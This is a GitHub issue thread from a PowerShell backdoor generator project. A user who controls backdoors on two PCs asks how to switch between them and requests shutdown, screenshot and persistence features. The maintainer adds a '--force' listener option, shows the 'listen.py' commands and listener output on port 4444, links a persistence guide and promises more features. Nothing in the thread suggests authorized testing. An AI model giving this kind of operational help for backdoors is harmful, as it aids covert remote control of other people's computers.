### ISSUE TITLE
hey hi i have a problem how to change connection from one backdoor to another?

### ISSUE THREAD

**Issue by Zerka007** [Drew-Alleman/powershell-backdoor#3]
I have 2 backdoors on 2 different pc how to switch from one to another ?

**Comment by Drew-Alleman** [comment]
Hi,

At the moment right now, I don't have that feature, but I can work on it later. Would the command below work for your use case?

```
--force FORCE, Specify what IP address to receive a backdoor connection from 
```
and then for example
```
python listen.py --force 10.11.1.12
```
Best,
Drew

**Comment by Zerka007** [comment]
ah ok you can add commands like "shutdown" "screenshot" and a persistence and more?

**Comment by Drew-Alleman** [comment]
Hi,

I will work on the ```--force``` option and look into the others you suggested.  For persistence please follow the guide [here](https://github.com/Drew-Alleman/powershell-backdoor-generator/issues/2#issuecomment-1546996105).

Best,
Drew

**Comment by Zerka007** [comment]
okay thanks

**Comment by Drew-Alleman** [comment]
Hi,

I just added the ```--force``` option. Can you try it out and let me know how it works for you? I added an example below.

```
C:\Users\Drew\Desktop\powershell-backdoor-generator-main>python listen.py -v --force 10.11.104.109
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:978637f1aa42731caefba96904a24ab25a23daa3
[*] Starting Backdoor Listener 10.11.11.22:4444 use CTRL+BREAK to stop
[*] Skipping connection from 10.11.11.22:15995 (--force was specified)
```

Best,
Drew

**Comment by Drew-Alleman** [comment]
Hi,

Can I mark this as resolved? Does the ```--force``` option work for you? If you don't respond within a few days I will mark this as closed, but if you have any additional questions feel free to put in another request. I will be working on the shutdown option.

Best,
Drew

**Comment by Zerka007** [comment]
Yeah it's good
